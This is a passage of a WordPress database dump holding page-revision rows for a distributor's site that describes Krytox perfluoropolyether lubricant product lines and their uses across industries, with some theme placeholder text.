Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><strong>Krytox Performance Lubricants Product Line</strong></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox for General Purpose Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 10X Oil / 20X Grease</td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 21X</td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 22X</td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and generalpurpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and generalpurpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Lubricants for Aerospace Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 143</td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 240</td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 250</td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 283</td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Extended Performance Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 1A series oils/XP 2A series greases</td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricating Fluids for Vacuum Pump Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox Vacuum Pump Fluids</td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Extra High Temperature Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- S, SX</td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- AC, ACX</td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- BD, BDX, BDZ</td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 246</td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 407</td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox LVP</td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nTo learn more about these products visit: <a href="https://en.wikipedia.org/wiki/Krytox">https://en.wikipedia.org/wiki/Krytox</a>\r\n\r\nTo learn more about our product line please visit:\r\n\r\nhttps://www.miller-stephenson.com/products/\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-09-28 16:27:50', '2016-09-28 16:27:50', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2078, 2, '2016-09-28 16:55:19', '2016-09-28 16:55:19', '<span style="font-size: 130%;"><strong>[ux_banner bg="https://imageurl" height="500px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect="sliding-glass"]</strong></span>\r\n<h4 class="alt-font">Smaller On Top</h4>\r\n___\r\n<h1>BIG HEADLINE</h1>\r\n<h4 class="thin-font">A smaller text under headline</h4>\r\n[button text="button" link="#" size="medium" style="is-outline white"]\r\n\r\n<span style="font-size: 130%;"><strong>[/ux_banner]Industries and Applications</strong></span>\r\n\r\n<strong>Pick your Industry</strong>\r\n\r\n<strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong>\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\n<strong>Food Processing</strong>\r\n\r\n<strong>Medical Industry Equipment Applications</strong>\r\n\r\n<strong>Metal Processing</strong>\r\n\r\n<strong>Oxygen and Reactive Gas Service</strong>\r\n\r\n<strong>Power Generation</strong>\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\n<strong>Textile</strong>\r\n\r\n<strong>Tire Mold</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Our categories" ]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 16:55:19', '2016-09-28 16:55:19', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2079, 2, '2016-09-28 16:55:58', '2016-09-28 16:55:58', '<span style="font-size: 130%;"><strong>[featured_box title="Title text" img="https://iconurl" img_width="" pos="center" link=""]</strong></span>\r\n\r\nFeatured box text\r\n\r\n<span style="font-size: 130%;"><strong>[/featured_box]\r\n</strong></span>\r\n<h4 class="alt-font">Smaller On Top</h4>\r\n___\r\n<h1>BIG HEADLINE</h1>\r\n<h4 class="thin-font">A smaller text under headline</h4>\r\n[button text="button" link="#" size="medium" style="is-outline white"]\r\n\r\n<span style="font-size: 130%;"><strong>[/ux_banner]Industries and Applications</strong></span>\r\n\r\n<strong>Pick your Industry</strong>\r\n\r\n<strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong>\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\n<strong>Food Processing</strong>\r\n\r\n<strong>Medical Industry Equipment Applications</strong>\r\n\r\n<strong>Metal Processing</strong>\r\n\r\n<strong>Oxygen and Reactive Gas Service</strong>\r\n\r\n<strong>Power Generation</strong>\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\n<strong>Textile</strong>\r\n\r\n<strong>Tire Mold</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Our categories" ]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable 